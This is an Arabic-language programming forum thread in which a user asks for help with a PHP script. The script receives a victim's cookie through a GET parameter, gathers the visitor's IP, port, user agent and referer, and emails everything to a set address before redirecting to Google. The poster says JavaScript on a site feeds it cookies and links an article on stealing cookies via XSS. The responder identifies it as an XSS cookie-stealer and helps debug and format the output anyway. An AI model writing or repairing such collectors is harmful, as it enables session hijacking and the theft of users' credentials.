_Mehdi نشر 23 سبتمبر 2016 أرسل تقرير مشاركة نشر 23 سبتمبر 2016 عندما اضع الكود التالي في php في السيرفر المحلي يتم تنفذ الكود بصورة صحيحة ويطبع كل القيم ولكن عندما ارفع الموقع على استضافة والكود ايضا على استضافة لاينفذ هذا الكود بصورة صحيحة فيظهر فقط الIP . مالسبب؟ $Msg="IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie"; اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
1 KSA brg نشر 24 سبتمبر 2016 أرسل تقرير مشاركة نشر 24 سبتمبر 2016 اعدادات جهازك تختلف عن الاستضافة افصل بين النص والكود كالتالي $Msg="IP:".$ip."| PORT: ".$rem_port. "| HOST:". $rem_host. "| Agent: ".$user_agent. "| METHOD: ".$rqst_method. "| REF: ".$referer."| DATE{ : }". $date." | COOKIE:". $cookie; اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 _Mehdi نشر 24 سبتمبر 2016 الكاتب أرسل تقرير مشاركة نشر 24 سبتمبر 2016 (معدل) اخي عندما اضعها بهذه الصورة يكون الناتج كالتالي IP:37.239.128.15| PORT: | HOST:| Agent: | METHOD: | REF: | DATE{ : } | COOKIE: ولايطبع كل القيم تم التعديل في 24 سبتمبر 2016 بواسطة java اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 KSA brg نشر 24 سبتمبر 2016 أرسل تقرير مشاركة نشر 24 سبتمبر 2016 ضع كود الصفحة اللتي لديك وساقوم بالتعديل عليها بما يلزم 1 اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 _Mehdi نشر 24 سبتمبر 2016 الكاتب أرسل تقرير مشاركة نشر 24 سبتمبر 2016 <?php $YourMail = "x@hotmail.com"; if(isset($_GET['index'])){ $cookie = $_GET['index']; $path = getenv('PATH'); $date=date ("l dS of F Y h:i:s A"); $rem_port = $_SERVER['REMOTE_PORT']; $rem_host = $_SERVER['REMOTE_HOST']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $referer = $_SERVER['HTTP_REFERER']; $redirect = "https://www.google.com"; Echo '<script>document. Location="'. $redirect.'"</script>'; } else print ' <body bgcolor="000000"> <center> <b><font color="red">404</font></b><br></center>'; if (getenv('HTTP_X_FORWARDED_FOR')) { $ip=getenv('HTTP_X_FORWARDED_FOR'); } else { $ip=getenv('REMOTE_ADDR'); } $Msg="IP:".$ip."| PORT: ".$rem_port. "| HOST:". $rem_host. "| Agent: ".$user_agent. "| REF: ".$referer."| DATE{ : }". $date." | COOKIE:". $cookie; $Send = mail ($YourMail,"cookie",$Msg); If ($Send) { if ($redirect <> ""){ header("location:".$redirect); } } ?> علما ان هذا الكود اعمل عليه في موقع من تصميمي لاختبار ثغرة وليس استخدام خبيث ضد المواقع اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 KSA brg نشر 24 سبتمبر 2016 أرسل تقرير مشاركة نشر 24 سبتمبر 2016 كودك صحيح المشكله اللي تواجهك انت لافتحت الرابط file.php يرسل فقط الايبي على الايميل بسبب الشرط if(isset($_GET['index'] لو تفتح الرابط مثل كذا file.php?index=1 بيرسل كامل المعلومات صحيحه 1 اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 _Mehdi نشر 24 سبتمبر 2016 الكاتب أرسل تقرير مشاركة نشر 24 سبتمبر 2016 (معدل) انا واضع هذا الكود على استضافة واضع كود جافاسكربت في الموقعي لكي يرسل قيمة الكوكيز لهذا الكود وعندما اضع هذا المتغيرات بهذه الصيغة يرسل المعلومات كاملة ولكن تكون بشكل مكدس بلافواضل انا لاابغي غير ترتيب المعلومات $Msg=$cookie.$path.$date.$ip.$rem_port.$rem_host.$user_agent.$referer; احتاج ان تكون مرتبه كما هي في هذا http://www.go4expert.com/articles/stealing-cookie-xss-t17066/ وشكراجزيلا لك على المساعدة تم التعديل في 24 سبتمبر 2016 بواسطة java اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 KSA brg نشر 24 سبتمبر 2016 أرسل تقرير مشاركة نشر 24 سبتمبر 2016 عزيزي انا من شفت الكود عرفت انه لاستغلال ثغرة Xss ولذلك تم استخدام المتغير index لكي ترسل القيمة ويتحقق الشرط بحيث يرسل كود جافا سكربت عباره عن document.cookie لكن لو اردت المعلومات تاتي تحت بعض تستخدم التنسيق html مثلا <br /> كل وحده بسطر جديد $Msg="IP:".$ip."<br />| PORT: ".$rem_port. "<br />| HOST:". $rem_host. "<br />| Agent: ".$user_agent. "<br />| REF: ".$referer."<br />| DATE{ : }". $date." <br />| COOKIE:". $cookie; 1 اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 _Mehdi نشر 24 سبتمبر 2016 الكاتب أرسل تقرير مشاركة نشر 24 سبتمبر 2016 عذرا اخي لم اقصد انك لم تفهم الموضوع ولكن اردت التوضيح اكثر لاني لم افهم اجابتك السابقة اي فايل تقصد بالضبط هذه الاجابة بتاريخ 44 دقائق مضت قال KSA brg: و تفتح الرابط مثل كذا file.php?index= وايضا عندما اضع <br /> ايضا لايتم تنفيذه بشكل صحيح شكرا جزيلا لك وعذرا على الاطالة اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 KSA brg نشر 24 سبتمبر 2016 أرسل تقرير مشاركة نشر 24 سبتمبر 2016 (معدل) انت حفظت الملف باسم معين فرضا انك حفظته باسم file.php لاجيت تفتحه بالمتصفح بيكون كذا http://localhost/file.php?index=cookei طبعا هو الكود مصمم لسحب الكوكيز يستقبل عن طريق المتغير لكن للتجربه لنجاح الكود تضع المتغير اندكس بعد اسم الملف تم التعديل في 24 سبتمبر 2016 بواسطة KSA brg اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
السؤال
_Mehdi
عندما اضع الكود التالي في php في السيرفر المحلي يتم تنفذ الكود بصورة صحيحة ويطبع كل القيم ولكن عندما ارفع الموقع على استضافة والكود ايضا على استضافة لاينفذ هذا الكود بصورة صحيحة فيظهر فقط الIP . مالسبب؟
$Msg="IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie";
رابط هذا التعليق
شارك على الشبكات الإجتماعية
9 أجوبة على هذا السؤال
Recommended Posts
انضم إلى النقاش
يمكنك أن تنشر الآن وتسجل لاحقًا. إذا كان لديك حساب، فسجل الدخول الآن لتنشر باسم حسابك.